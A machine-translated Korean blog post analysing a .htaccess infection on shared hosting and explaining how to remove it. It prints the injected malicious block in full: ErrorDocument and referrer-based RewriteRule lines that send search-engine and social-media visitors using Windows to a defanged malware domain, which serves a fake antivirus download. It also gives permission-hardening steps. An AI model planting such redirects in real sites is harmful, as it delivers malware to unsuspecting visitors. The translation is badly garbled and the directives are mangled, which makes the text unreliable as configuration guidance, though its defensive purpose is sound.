악성 코드 / 바이러스 - htaccess로 "다시"& 리디렉션

바이러스의 새로운 형태 나는 많은 사이트에 호스팅에 영향을 알고 있지 참조하는 안전하지 않은 서버 여기서 사용자 계정 / 서브 계정이 서로를 "볼"수 있습니다. 특히, 모든 호스팅 계정 "폴더에 배치됩니다가상 호스트쓰기의 "그리고 오른쪽 사용자 폴더 은 "가상 호스트는"대부분의 상황에서 일반 ... 대리점 사용자 지정됩니다. 이 웹 서버를 일반적인 방법을 사용하지 않는 WHM /의 cPanel.

이 동작은 바이러스를 .htaccess로 - 해킹 htaccess로

바이러스 파일에 영향을 htaccess로 피해자의 사이트. 라인이 추가됩니다 / 지령방문자를 리디렉션 제공하는 일부 웹 사이트 (야후, MSN, 구글, 페이스 북, yaindex, 트위터, 마이 스페이스, 높은 트래픽을 가지고있는 사이트와 포털에서 오는) "안티 바이러스". 그것은이다 가짜 안티 바이러스 솔루션어떤 정보 나에 대한 소개에 쓴 .

여기가 어떻게 생겼는지입니다 htaccess로 영향 (아래 내용 라인의 URL을 액세스 할)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

한다 RewriteEngine에

한다 RewriteCond % {HTTP_REFERER}. * Yandex 주차. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 오드 노 클라스 니키. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 명 Vkontakte. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 연락처 Rambler. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 튜브. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 위키 백과. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 블로거. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 바이. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 미니 홈피. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 트위터. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 페이스 북. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 구글. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 라이브. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 된 Aol. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 빙. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * MSN. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 아마존. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 이베이. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 링크드. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 플리커 (Flickr). * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 소소. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 더블 클릭. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 폰 허브. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 오르 컷. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 라이브 저널. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 워드 프레스. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 야후. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 문의하십시오. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 흥분. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 알타 비스타. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * MSN. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 넷스케이프. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * Hotbot와. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 고토. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 인포시크. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 맘마. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * AllTheWeb에. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 라이코스. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. *를 검색합니다. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 메일. * $ [NC, OR]
한다 RewriteCond % {HTTP_REFERER}. * 잡아. * $ [NC]

한다 RewriteCond % {HTTP_USER_AGENT}. * 윈도우 *.
. RewriteRule의 * Hxxp : //wwww.peoriavascularsurgery.com/main.php H는 = % {} 난 = HTTP_HOST J8iiidsar / qmiRj7V8NOyJoXpA == & E = R [R, L]

REQUEST_FILENAME한다 RewriteCond %의 {}! -f
REQUEST_FILENAME한다 RewriteCond %의 {}! -d
REQUEST_FILENAME한다 RewriteCond %의 {}! * 도트 JPG $ |. * 지프 $ |. * PNG로 $
한다 RewriteCond % {HTTP_USER_AGENT}. * 윈도우 *.
RewriteRule의 * Hxxp :.? //wwww.peoriavascularsurgery.com/main.php H는 = % {} I = HTTP_HOST J8iiidsar / qmiRj7V8NOyJoXpA == & E = 4 [R, L]

워드 프레스를 사용하는 사람들이 파일에 다음 줄을 찾을 수 있습니다 htaccess로 부터 public_html이. 또한, 상기 바이러스는 동일의 .htaccess 폴더를 작성 WP - 콘텐츠.

*대신 표시되는 경우도 있습니다 peoriavascularsurgery.com dns.thesoulfoodcafe.com 또는 다른 주소.

어떻게이 바이러스를합니다.

일단 재, 방문자는 메시지가 두 팔을 벌려 환영합니다 :

경고!
컴퓨터가 바이러스 및 악성 프로그램의 존재의 다양한 기호를 포함합니다. 즉각적인 안티 바이러스 시스템 검사가 필요합니다!
보안 시스템은 바이러스 및 악성 프로그램에 대한 귀하의 PC의 신속하고 무료로 스캔을 수행합니다.

1 악성 코드

버튼을 누르면 상관없이, 우리는 "페이지로 이동합니다내 컴퓨터"모방하기 위해 만들어 디자인 XP. 이렇게하면 우리는 "감염"것을 발견 한 끝에 "검색"을 시작합니다.

2 악성 코드

확인을 클릭하거나 취소 한 후에는 시작됩니다 다운로드파일의 setup.exe를. 이 setup.exe를 가짜 안티 바이러스 시스템에 영향을 미치는. 당신이 더 링크 바이러스를 전파하는 몇 가지 악성 코드를 설치하고,이 외에 안티 바이러스 소프트웨어 (모두 false)를 한 피해자가 사고에 초대합니다.
이미 바이러스를 연락 한 사람들이 양식을 사용할 수 있습니다 . 또한 전체 하드 디스크를 스캔하는 것이 좋습니다. 추천 카스퍼 스키 인터넷 시큐리티 또는 카스퍼 스키 안티 바이러스.

바이러스의이 유형은 방문자 OS 운영 체제에 영향을 미치는 윈도우 XP, 윈도우 ME, 윈도우 2000, 윈도우 NT, 윈도우 98 및 Windows 95. 지금까지 운영 체제 Windows Vista 및 Windows 7 감염의 알려진 경우이 없습니다.

우리가 어떻게 서버에이 바이러스. htaccess로 파일을 제거 할 수 있고, 감염을 방지하는 방법에 대해 설명합니다.

1. 의심스러운 파일 및 지우기 코드를 분석합니다. 파일 만 영향을받지 않도록하려면, htaccess로 더 나은 모든 파일을 분석 . PHP는 si . JS.

2. 파일을 다시 작성. htaccess로 내가 설정 chmod를 644 또는 744 쓰기 액세스 만 사용자가 소유자.

3. 당신이 폴더에있는 웹 사이트에 대한 호스팅 계정을 만들 때 홈 / 또는 / 웹 루트 이렇게하면 종종 사용자의 이름을 가진 폴더를 생성합니다 (의 cPanel, FTP에 대한 사용자등). 쓰기 데이터를 한 사용자에서 다른 사용자에게 전송 바이러스를 방지하려면 각 사용자 폴더를 설정할 것을 권장합니다 :

chmod를하거나 644 744, 755 - 표시는 644입니다.
CHOWN-R nume_user의 nume_folder.
chgrp 명령-R nume_user nume_folder

LS-모든 올바르게 만들어진 있는지 확인하는 방법. 다음과 같이 나타납니다 :

drwx-X-X 12 Dinamics Dinamics 월 4096 6 14 : 51 Dinamics /
drwx-X-X 10 듀란듀란 월 4096 7 07 : 46 듀란 /
drwx-X-X 12 4096 월 29 11 튜브 관 : 23 튜브 /
drwxr-XR-X 14 4096 2월 26 2009 간편 익스프레스 /
drwxr-XR-X 9 EZO EZO 월 4096 19 01 : 09 EZO /
drwx-X-X 제약 제약 9 4096 12월 19 22 : 29 제약 /

위의 한 userele FTP 될 경우 감염된 파일그것은 다른 사용자의 호스트에 바이러스를 보낼 수 없습니다. 그것은 웹 서버에 호스팅 계정을 보호하기위한 최소한의 안전망이다.

이러한 종류의 바이러스에 의해 영향을받는 지역의 일반적인 요소입니다.

영향을받는 모든 부분은 "/를 포함하는 도메인 이름으로 사이트에 방문자를 리디렉션".

이 "바이러스. htaccess로"CMS의 모든 유형에 미치는 영향 (Joomla를, 워드 프레스, phpBB를등)이 사용 htaccess로.

. htaccess가 바이러스 해킹 및 리디렉션.

악성 코드 / 바이러스 - htaccess로 "다시"& 리디렉션

저자에 관하여

스텔스 LP

설립자와 편집자 스텔스 설정2006 날짜합니다.
Linux 운영 체제 (특히에 CentOS), 맥 OS X, 윈도우 XP> 윈도우 10 워드 프레스 (CMS)에 경험.

코멘트를 남겨

이 사이트는 Akismet을 사용하여 스팸을 줄입니다. 댓글 데이터 처리 방법 알아보기.